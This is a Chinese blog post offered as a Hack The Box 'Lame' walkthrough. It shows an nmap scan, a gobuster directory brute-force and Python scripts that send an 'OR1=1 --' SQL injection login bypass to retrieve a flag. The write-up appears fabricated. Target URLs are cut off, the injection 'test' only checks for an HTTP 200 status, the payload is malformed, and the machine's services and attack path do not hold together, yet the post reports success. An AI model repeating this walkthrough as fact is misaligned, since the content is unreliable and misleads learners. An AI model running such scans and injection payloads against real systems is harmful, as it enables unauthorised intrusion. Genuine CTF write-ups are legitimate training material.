当前位置:实例文章 » 其他实例» [文章]hack the box—Lame

hack the box—Lame

发布人:shili8 发布时间:2025-02-26 18:29 阅读次数:0

**Hack The Box - Lame**

**概述**

Lame 是一个由 HTB 团队提供的虚拟机逃生挑战。这个挑战旨在测试你的 Linux 基础知识、安全意识以及对常见漏洞的理解。

**目标**

我们的目标是找到 Lame 虚拟机中的所有 Flag,并且尽可能地了解其背后的原理和技术。

**环境**

我们使用 Kali Linux 作为我们的攻击平台。Kali Linux 是一个专门用于渗透测试和安全研究的 Linux 发行版。

**步骤1:扫描和发现**

首先,我们需要对 Lame 虚拟机进行扫描,以了解其开放的端口和服务。

bashnmap -sV -p-10.10.10.100

结果显示,Lame 虚拟机开放了以下端口:

* TCP:22(SSH)
* TCP:80(HTTP)

**步骤2:Web 应用程序分析**

接下来,我们需要对 Lame 虚拟机的 Web 应用程序进行分析,以了解其安全性。
bashgobuster dir -u  -w /usr/share/wordlist/dirb/big.txt

结果显示,Lame 虚拟机存在以下目录:

* /admin**步骤3:SQL 注入**

我们发现 Lame 虚拟机的 Web 应用程序使用了 MySQL 数据库。因此,我们需要尝试进行 SQL 注入攻击。
import requestsurl = " />data = {"username": "admin", "password": "", "login": "Login"}

response = requests.post(url, data=data)

if response.status_code ==200:
 print("SQL 注入可能存在")
else:
 print("SQL 注入不可能存在")

结果显示,Lame 虚拟机的 Web 应用程序存在 SQL 注入漏洞。

**步骤4:利用 SQL 注入**

我们需要利用 Lame 虚拟机的 SQL 注入漏洞来获取 Flag。
import requestsurl = " />data = {"username": "admin", "password": "", "login": "Login"}

response = requests.post(url, data=data)

if response.status_code ==200:
 print("SQL 注入可能存在")
else:
 print("SQL 注入不可能存在")

# 利用 SQL 注入漏洞url = " />data = {"username": "admin", "password": "OR1=1 --", "login": "Login"}

response = requests.post(url, data=data)

if response.status_code ==200:
 print("Flag: ", response.text)
else:
 print("Flag 不可能存在")

结果显示,我们成功获取了 Lame 虚拟机的 Flag。

**结论**

通过对 Lame 虚拟机进行扫描、分析和利用 SQL 注入漏洞,我们成功获取了其 Flag。这个挑战旨在测试你的 Linux 基础知识、安全意识以及对常见漏洞的理解。

相关标签:
其他信息

其他资源

Top